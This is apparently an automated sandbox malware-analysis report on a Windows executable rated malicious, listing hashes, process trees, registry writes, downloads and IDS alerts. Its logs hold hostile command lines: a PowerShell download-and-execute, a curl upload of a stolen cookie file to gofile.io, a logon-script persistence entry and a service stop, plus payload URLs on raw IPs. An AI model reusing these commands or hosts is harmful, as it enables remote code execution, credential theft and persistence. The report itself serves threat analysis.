| File name: | main.exe |
| Full analysis: | https://app.any.run/tasks/a179ceeb-32cb-4eb0-97ad-177ff6620e67 |
| Verdict: | Malicious activity |
| Threats: | Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security. |
| Analysis date: | April 25, 2026, 16:19:27 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (console) x86-64, for MS Windows, 7 sections |
| MD5: | C942A56638772644D847709D906FA23D |
| SHA1: | 12D6B77FEC2244CDC4050A083AA741185CC48010 |
| SHA256: | 56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A |
| SSDEEP: | 98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:06:19 18:59:12+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.43 |
| CodeSize: | 178688 |
| InitializedDataSize: | 154624 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xc380 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 508 | bot_x64.exe | C:\Users\admin\Desktop\a\bot_x64.exe | main.exe | ||||||||||||
User: admin Company: Intel Corporation Integrity Level: HIGH Description: Volume Shadow Copy Service Version: 2.9.7035.67 Modules
| |||||||||||||||
| 672 | vnc.exe | C:\Users\admin\Desktop\a\vnc.exe | — | main.exe | |||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 900 | Silentum_Spoofer.exe | C:\Users\admin\Desktop\a\Silentum_Spoofer.exe | main.exe | ||||||||||||
User: admin Integrity Level: HIGH Description: Version: 0.0.0.0 Modules
| |||||||||||||||
| 1652 | cd4.exe | C:\Users\admin\Desktop\a\cd4.exe | — | main.exe | |||||||||||
User: admin Integrity Level: HIGH Modules
| |||||||||||||||
| 1860 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | nwinfo.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1972 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Invoke-RestMethod 79.8141710/cl-ncl-start | Invoke-Expression" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2136 | C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile" | C:\Windows\System32\cmd.exe | mvc3.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2164 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpu | C:\Program Files\Google\Chrome\Application\chrome.exe | L7XH7UR9695U.exe | ||||||||||||
User: admin Company: Google LLC Integrity Level: HIGH Description: Google Chrome Exit code: 0 Version: 133.0.6943.127 Modules
| |||||||||||||||
| 2164 | "C:\WINDOWS\System32\sc.exe" stop UsoSvc | C:\Windows\System32\sc.exe | — | nslookup.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Service Control Manager Configuration Tool Exit code: 1062 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2232 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4696) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 23004100430042006C006F00620000000000000000000000010000000000000000000000 | |||
| (PID) Process: | (4696) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconLayouts |
Value: 00000000000000000000000000000000030001000100010014000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C0000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C0000001700000000000000610075006300740069006F006E00730070006500630069006600690063002E007200740066003E002000200000000F0000000000000065007600650072007000640066002E007200740066003E00200020000000170000000000000065006E0074007200790063006F006C006C0065006300740069006F006E002E007200740066003E002000200000001C00000000000000660075006E006300740069006F006E00730063006F006D006D0075006E00690074006900650073002E0070006E0067003E0020002000000011000000000000006B006E006F0077006E0064006F006E0065002E0070006E0067003E0020002000000015000000000000006D006F00640065006C00700072006F006A0065006300740073002E006A00700067003E0020002000000017000000000000006F007000740069006F006E0061006C0073006300690065006E00630065002E006A00700067003E0020002000000014000000000000006F0076006500720076006900650077006400610072006B002E007200740066003E002000200000001800000000000000670072006500610074006500720065006D0070006C006F0079006500650073002E0070006E0067003E0020002000000012000000000000006C006100720067006500730074006800690074002E0070006E0067003E002000200000000C000000000000006D00610069006E002E006500780065003E00200020000000160000000000000072006500730075006C00740064006F00630075006D0065006E0074002E007200740066003E002000200000001800000000000000770068006F006C00650069006E0064006900760069006400750061006C0073002E006A00700067003E0020002000000002000000000000000200010000000000000000000100000000000000020001000000000000000000110000000600000001000000140000000000000000000000000000000000000000000000803F0100000000000000004002000000000000004040030000000000000080400400000000000000A04005000000803F0000000006000000803F0000004008000000803F0000803F07000000803F0000404009000000803F000080400A0000000040000040400F000000803F0000A0400B000000004000008040100000000040000000000C00000000400000803F0D0000000040000000400E000000404000000040120000004040000040401300000000400000A040110002000100000000000000000001000000000000000200010000000000000000001200000007000000010000001400000000000000000000000000000000000000803F0000000007000000803F000000400900000000000000404008000000803F000040400A000000803F000080400F000000803F0000A0400B000000803F0000C040100000000040000000000C00000000400000803F0D0000000040000000400E000000004000004040120000000040000080401300000000000000803F01000000000000000040020000000000000080400300000000000000A0400400000000000000C04005000000803F0000803F0600000000400000A0401100 | |||
| (PID) Process: | (4696) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconNameVersion |
Value: 1 | |||
| (PID) Process: | (4696) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts |
| Operation: | write | Name: | LastUpdate |
Value: 96E9EC6900000000 | |||
| (PID) Process: | (4696) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000027031A |
| Operation: | write | Name: | VirtualDesktop |
Value: 100000003030445602603FA5B72DE44882A417B3949BF781 | |||
| (PID) Process: | (7876) Taskmgr.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager |
| Operation: | delete value | Name: | Preferences |
Value: | |||
| (PID) Process: | (4696) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000D020E |
| Operation: | write | Name: | VirtualDesktop |
Value: 100000003030445602603FA5B72DE44882A417B3949BF781 | |||
| (PID) Process: | (508) bot_x64.exe | Key: | HKEY_CURRENT_USER\Environment |
| Operation: | write | Name: | UserInitMprLogonScript |
Value: "C:\WINDOWS\system32\cmd.exe" /c start /b "" "C:\Users\admin\Desktop\a\bot_x64.exe" | |||
| (PID) Process: | (508) bot_x64.exe | Key: | HKEY_CURRENT_USER\Environment |
| Operation: | write | Name: | UserInitMprLogonScript |
Value: "C:\WINDOWS\system32\cmd.exe" /c start /b "" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Services\winhost.exe" | |||
| (PID) Process: | (4696) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconLayouts |
Value: 00000000000000000000000000000000030001000100010015000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C0000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C0000001700000000000000610075006300740069006F006E00730070006500630069006600690063002E007200740066003E002000200000000F0000000000000065007600650072007000640066002E007200740066003E00200020000000170000000000000065006E0074007200790063006F006C006C0065006300740069006F006E002E007200740066003E002000200000001C00000000000000660075006E006300740069006F006E00730063006F006D006D0075006E00690074006900650073002E0070006E0067003E0020002000000011000000000000006B006E006F0077006E0064006F006E0065002E0070006E0067003E0020002000000015000000000000006D006F00640065006C00700072006F006A0065006300740073002E006A00700067003E0020002000000017000000000000006F007000740069006F006E0061006C0073006300690065006E00630065002E006A00700067003E0020002000000014000000000000006F0076006500720076006900650077006400610072006B002E007200740066003E002000200000001800000000000000670072006500610074006500720065006D0070006C006F0079006500650073002E0070006E0067003E0020002000000012000000000000006C006100720067006500730074006800690074002E0070006E0067003E002000200000000C000000000000006D00610069006E002E006500780065003E00200020000000160000000000000072006500730075006C00740064006F00630075006D0065006E0074002E007200740066003E002000200000001800000000000000770068006F006C00650069006E0064006900760069006400750061006C0073002E006A00700067003E00200020000000050000000000000061003E005C002000000002000000000000000200010000000000000000000100000000000000020001000000000000000000110000000600000001000000150000000000000000000000000000000000000000000000803F0100000000000000004002000000000000004040030000000000000080400400000000000000A04005000000803F0000000006000000803F0000004008000000803F0000803F07000000803F0000404009000000803F000080400A0000000040000040400F000000803F0000A0400B000000004000008040100000000040000000000C00000000400000803F0D0000000040000000400E000000404000000040120000004040000040401300000000400000A04011000000404000008040140002000100000000000000000001000000000000000200010000000000000000001200000007000000010000001500000000000000000000400000C0401400000000000000000000000000803F0000000007000000803F000000400900000000000000404008000000803F000040400A000000803F000080400F000000803F0000A0400B000000803F0000C040100000000040000000000C00000000400000803F0D0000000040000000400E000000004000004040120000000040000080401300000000000000803F01000000000000000040020000000000000080400300000000000000A0400400000000000000C04005000000803F0000803F0600000000400000A0401100 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\_bz2.pyd | executable | |
MD5:684D656AADA9F7D74F5A5BDCF16D0EDB | SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C | |||
| 4696 | explorer.exe | C:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat | text | |
MD5:E49C56350AEDF784BFE00E444B879672 | SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\_asyncio.pyd | executable | |
MD5:56F958EEBBC62305B4BF690D61C78E28 | SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31 | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\_hashlib.pyd | executable | |
MD5:3E540EF568215561590DF215801B0F59 | SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\_overlapped.pyd | executable | |
MD5:363409FBACB1867F2CE45E3C6922DDB4 | SHA256:F154AC9D5CA0646D18F6197C0406F7541B6E0752B2D82A330036C1E39D3A49E7 | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\VCRUNTIME140.dll | executable | |
MD5:32DA96115C9D783A0769312C0482A62D | SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\_queue.pyd | executable | |
MD5:CC0F4A77CCFE39EFC8019FA8B74C06D0 | SHA256:DEE7D19A9FCAB0DF043DC56F2CDC32F1A2A968AB229679B38B378C61CA0CBA53 | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\api-ms-win-core-errorhandling-l1-1-0.dll | executable | |
MD5:5DB4B10081A52D02D078401FA62DCE20 | SHA256:FE9EC4E8C35C485E093CCBC1FAC402C9077A620F3139DD041E2E5E68115EC189 | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\_cffi_backend.cp313-win_amd64.pyd | executable | |
MD5:5CBA92E7C00D09A55F5CBADC8D16CD26 | SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85 | |||
| 6884 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI68842\api-ms-win-core-file-l1-1-0.dll | executable | |
MD5:B914966BC29D1C55A656071AD9E592AA | SHA256:35A8879678F63635E2D4D41DEC511B0E71AB8E5B8BF7F8B92AC615E4452D2AF8 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5532 | SearchApp.exe | GET | 200 | 23.11.41.157:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D | NL | binary | 312 b | whitelisted |
— | — | GET | 200 | 204.79.197.203:80 | http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D | US | binary | 960 b | whitelisted |
8072 | main.exe | GET | 200 | 82.26.74.80:5001 | http://82.26.74.80:5001/bot.exe | DE | executable | 5.96 Mb | malicious |
8072 | main.exe | GET | — | 168.222.254.210:8079 | http://168.222.254.210:8079/5252.exe | GB | — | — | unknown |
8072 | main.exe | GET | 200 | 62.60.226.203:80 | http://62.60.226.203/gertgherthre.exe | GB | executable | 4.63 Mb | malicious |
8072 | main.exe | GET | 200 | 168.222.254.210:8079 | http://168.222.254.210:8079/52.exe | GB | executable | 2.91 Mb | malicious |
8072 | main.exe | GET | — | 91.92.242.236:80 | http://91.92.242.236/oPvjr94jfe/Plugins/vnc.exe | SC | — | — | unknown |
8072 | main.exe | GET | 200 | 38.76.199.154:8888 | http://38.76.199.154:8888/pro_payload.exe | US | executable | 3.00 Kb | unknown |
8072 | main.exe | GET | 200 | 38.76.199.154:8888 | http://38.76.199.154:8888/pro_stager.exe | US | text | 4.00 Kb | unknown |
8072 | main.exe | GET | — | 118.107.44.190:8080 | http://118.107.44.190:8080/2.exe | HK | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
3352 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5276 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
6116 | slui.exe | 128.24.231.65:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5532 | SearchApp.exe | 2.16.241.218:443 | www.bing.com | AKAMAI-ASN1 | NL | whitelisted |
5532 | SearchApp.exe | 23.11.41.157:80 | ocsp.digicert.com | AKAMAI-AMS | NL | whitelisted |
— | — | 204.79.197.203:80 | oneocsp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
8072 | main.exe | 151.101.2.49:443 | urlhaus.abuse.ch | FASTLY | US | whitelisted |
8072 | main.exe | 82.26.74.80:5001 | — | FZINK | DE | malicious |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
oneocsp.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
urlhaus.abuse.ch |
| whitelisted |
dcdivas.com |
| unknown |
enotpidarmot.pw |
| unknown |
sonra.eutialyson.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
2232 | svchost.exe | Misc activity | INFO [ANY.RUN] .pw TLD domain request |
2232 | svchost.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT Observed DNS Query to ClickFix Domain (dcdivas .com) |
8072 | main.exe | Misc activity | INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET) |
8072 | main.exe | Misc activity | INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET) |
8072 | main.exe | Misc activity | POLICY [ANY.RUN] Python requests User-agent in HTTP request |
8072 | main.exe | A Network Trojan was detected | ET MALWARE Executable Downloaded From Common Payload Delivery Host (GET) |
8072 | main.exe | Misc activity | POLICY [ANY.RUN] Python requests User-agent in HTTP request |
8072 | main.exe | Misc activity | INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET) |
8072 | main.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 8 |
8072 | main.exe | Misc activity | POLICY [ANY.RUN] Python requests User-agent in HTTP request |
Process | Message |
|---|---|
v38438.exe | CLR: Managed code called FailFast without specifying a reason.
|
CritScript.exe | C:\Users\admin\AppData\Local\Temp\JUSCHED.EXE |
PPTV(pplive)_forap_1084_9993.exe | [AsynDownload] NewDownload ID:3 url:http://ins.pplive.com/config/pptv/qd-all-slient-onelink-autostart/forqd1084/bind_en-us.ini |
dxwsetup.exe | DLL_PROCESS_ATTACH |
dxwsetup.exe | DLL_PROCESS_ATTACH |
dxwsetup.exe | Invalid parameter passed to C runtime function.
|
dxwsetup.exe | Invalid parameter passed to C runtime function.
|
dxwsetup.exe | DLL_PROCESS_DETACH |
dxwsetup.exe | DLL_PROCESS_DETACH |
autocad_v1.4.exe | [INFO]AppPath: "C:/Users/admin/Desktop/a/autocad_v1.4.exe"
|